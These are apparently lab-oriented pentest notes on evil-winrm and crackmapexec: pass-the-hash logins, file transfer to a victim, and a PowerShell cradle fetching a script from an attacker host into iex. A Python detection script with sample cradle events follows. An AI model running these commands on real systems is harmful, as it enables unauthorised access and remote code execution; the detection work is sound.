>crackmapexec winrm [IP] -u [ID] -p [ID]
>crackmapexec smb [IP] -u [ID] -p [ID]
>crackmapexec smb [IP] -u [ID] -H [NTLM Hash]
Check if the ID/PW works or not. multiple protocol supported. The user has to be in the “Remote Management Group”
>evil-winrm -i [IP] -u [USER] -p [Password]
>evil-winrm -i [IP] -u [USER] -H [NTLM Hash]
Ruby tool for connecting to a Windows host over WinRM.
>evil-winrm -i 10.10.10.161 -u [USER] -H [NTLM Hash]
Pass-the-Hash (PtH) with evil-winrm; the hash is passed with -H, not -p. The advantage of evil-winrm is that you can run PowerShell scripts in the shell, including PowerSploit.
*Evil-WinRM* PS C:\Users\NL>upload [local file path]
Upload a local file to the victim.
*Evil-WinRM* PS C:\Users\NL>download C:\temp\xxx /home/user/temp/xxx
Download a file from the victim to the local path.
*Evil-WinRM* PS C:\Users\NL>services
List the services on the victim.
*Evil-WinRM* PS C:\Users\NL>Set-ExecutionPolicy Unrestricted -Scope CurrentUser
Change the Execution Policy for the current user only (mostly used by a normal user to conduct PrivEsc).
*Evil-WinRM* PS C:\programdata> curl http://[Attacker IP]/PrivEsc.ps1 -UseBasicParsing | iex
*Evil-WinRM* PS C:\programdata> Get-Command [CMD in PrivEsc.ps1]
Another way to bypass the Execution Policy. Fetch the script from the attacker's host as an HTTP request (curl is an alias of Invoke-WebRequest in Windows PowerShell, so the URL needs the http:// scheme) and pipe it into iex (Invoke-Expression), so it never touches disk as a .ps1 file. -UseBasicParsing lets the request succeed even when the IE (Internet Explorer) engine isn't available.
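The defender's side of the two tricks above, as an added example that is not part of the original notes: a small Python triage over constructed PowerShell script block log entries (Event ID 4104 ScriptBlockText), flagging the web-fetch-piped-into-iex cradle and the execution-policy change, and noting when the host process is wsmprovhost.exe (the process that hosts a remote WinRM PowerShell session). The sample events, the IP 203.0.113.5 and the rule names are constructed for this example.

```python
import re

# Fetch side of the cradle: Invoke-WebRequest and its Windows PowerShell aliases
# (curl, iwr, wget), Invoke-RestMethod/irm, or WebClient.DownloadString/DownloadData.
FETCH = r"(invoke-webrequest|\biwr\b|\bcurl\b|\bwget\b|invoke-restmethod|\birm\b|downloadstring|downloaddata)"
# Execution side: Invoke-Expression or its alias iex.
IEX = r"(invoke-expression|\biex\b)"

RULES = {
    # fetch ... iex (pipe form) or iex ... fetch (IEX (...).DownloadString(...) form)
    "download_cradle": re.compile(FETCH + r".*" + IEX + r"|" + IEX + r".*" + FETCH, re.I | re.S),
    "execution_policy_weakened": re.compile(r"set-executionpolicy\s+(unrestricted|bypass)", re.I),
}


def classify_script_block(text: str) -> list[str]:
    """Return the names of the rules that match one 4104 ScriptBlockText value."""
    return [name for name, rx in RULES.items() if rx.search(text)]


# Constructed sample events, not real logs: (event id, host process, script block text).
SAMPLE_EVENTS = [
    (4104, "wsmprovhost.exe", "curl http://203.0.113.5/PrivEsc.ps1 -UseBasicParsing | iex"),
    (4104, "wsmprovhost.exe", "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"),
    (4104, "powershell.exe", "Get-ChildItem C:\\Users | Select-Object Name"),
    (4104, "wsmprovhost.exe", "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/a.ps1')"),
]


def triage(events):
    """Return one hit per (event, rule) match; remote_session is True when the block ran
    under wsmprovhost.exe, i.e. inside a WinRM session such as the one evil-winrm opens."""
    hits = []
    for _event_id, process, block in events:
        for rule in classify_script_block(block):
            hits.append({"process": process, "rule": rule,
                         "remote_session": process.lower() == "wsmprovhost.exe"})
    return hits


if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(hit)
```

Script block logging must be enabled for 4104 events to exist; pairing the hit with a 4624 logon type 3 from the same source is the usual next step.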